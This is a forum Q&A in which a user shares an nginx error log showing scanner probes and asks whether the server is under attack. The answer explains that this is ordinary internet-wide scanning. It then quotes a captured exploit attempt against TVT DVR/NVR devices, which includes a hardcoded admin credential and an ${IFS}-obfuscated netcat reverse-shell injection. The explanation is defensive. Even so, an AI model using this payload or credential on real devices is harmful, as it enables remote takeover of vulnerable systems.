by looking at nginx error log, Is my server under attack?

user938363 picture user938363 · Oct 4, 2019 · Viewed 8.9k times · Source

Here is portion of nginx eror log on ubuntu 18.04. There is a constant http request to my nodejs server. My question is that is the server under attack? By looking online, 52.69.23.0/255.255.255.0 is a block from Tokyo, Japan.

2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"

Answer

Vincent picture Vincent · Oct 5, 2019

Any server connected to the public internet will be under attack on some level, even if it is not vulnerable. Internet-wide vulnerability scanning will find its way to you. The traffic indicates PHP scans and some other interesting traffic which has recently shown up on my IPS:

The host 93.174.93[.]178 sent HTTP POST request to destination URL "editBlackAndWhiteList" with Base64 encoded credentials:

admin:{12213BD1-69C7-4862-843D-260500D1DA40}

XML Payload:

refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)

IFS stands for "internal field separator". It is used by the shell to determine how to do word splitting.

The default value for IFS consists of whitespace characters (space, tab, and newline). $IFS or ${IFS}, are often used in command injection to replace white space. For many command-line interpreters, shells of Unix operating systems, the internal field separator is a variable that defines the characters used to separate a pattern into tokens for some operations. $(nc 93.174.93[.]178 31337 -e $SHELL&) – Netcat Reverse Shell to host 93.174.93[.]178 on port 31337.

Fortinet has an IPS signature for this traffic, “HTTP.Unix.Shell.IFS.Remote.Code.Execution.” It indicates the detection of suspicious HTTP requests that use internal field separators.

https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution

Snort IPS flags this traffic under the signature,” ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted.”

The host is attempting to exploit a Remote Code Execution vulnerability in Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API via a hardcoded 'admin' web GUI password to get a reverse shell. Six POC’s are available on GitHub: https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt

It would be wise to setup an IPS in front of your web server.